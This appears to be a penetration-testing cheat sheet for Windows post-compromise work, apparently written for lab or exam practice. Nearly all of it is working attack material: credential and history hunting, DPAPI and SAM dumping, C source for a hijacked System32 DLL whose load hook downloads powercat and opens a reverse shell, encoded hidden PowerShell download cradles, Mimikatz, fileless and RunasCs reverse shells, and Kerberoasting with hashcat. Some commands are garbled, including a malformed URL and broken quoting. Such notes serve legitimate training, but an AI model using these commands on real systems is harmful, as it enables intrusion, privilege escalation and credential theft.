Post Compromise
There are several key pieces of information we should always obtain:
- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes
Display network and process info
route print
netstat -ano
powershell -command "Get-Process"
tasklist
Check installed applications
# 32 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# 64 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Display Application Details
powershell.exe -command "Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*""
Searching stuff
#Search for .kdbx files
powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"
#Search for txt , ini files
powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue"
#Search for .txt, .pdf, .xls, .xlsx, .doc, .docx
powershell -command 'Get-ChildItem -Path C:\Users\dave\ -Include powershell -command "*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"'
Checking History
Get-History
type (Get-PSReadlineOption).HistorySavePath
ConsoleHost_history #Find the PATH where is saved
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Get DPAPI Master Key
Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 4/1/2024 7:55 AM S-1-5-21-2309961351-4093026482-2223492918-1002
Get-ChildItem -Hidden C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 11/8/2022 7:36 AM 468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636
-a-hs- 4/1/2024 7:55 AM 468 3ff87438-3511-45ac-91ff-611a4521838f
-a-hs- 2/10/2023 5:28 AM 468 7ba528f7-4e73-48a3-8a67-e5680688c9ff
-a-hs- 6/15/2022 7:48 PM 468 d713cea3-8216-4125-b4eb-26f1b4b313e7
-a-hs- 4/1/2024 7:55 AM 24 Preferred
Dumping SYSTEM and LOCAL
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
DLL Injection (if we have System32 folder write access but cannot get shell)
tzres.dll
Generate a custom DLL and locate it at C:\Windows\System32\tzres.dll
# run if cannot compile
sudo apt-get install mingw-w64
x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll
rev.cpp
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
1.1 Additional (encoding the reverse shell)
echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211.ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo
powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA
Open listener
sudo rlwrap nc -nlvp 17788
Attain a system shell access.
Printconfig.dll
Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Initiate the PrintNotify object by executing the following PowerShell commands:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Attain a system shell access.
wpcoreutil.dll
phoneinfo.dll
dxgi.dll
wlbsctrl.dll
wbecomn.dll
ualapi.dll
Mimikatz
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/mimikatz.exe');
.\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt
Fileless Reverse Shell
powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell
Double reverse shell (runas also have exe)
iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); import-module ./Invoke-RunasCs.ps1;Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell"
#Make sure
python3 -m http.server 80
192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 -
192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 -
Local GetSPN.ps1
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); ./Get-SPN.ps1
#Request user svc_mssql ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
#Steal the ticket
iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat
Copy and paste the hash , remember replace "space" and all "\n" with "empty"
hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt
Cracking the hash with hashcat
Last updated
Was this helpful?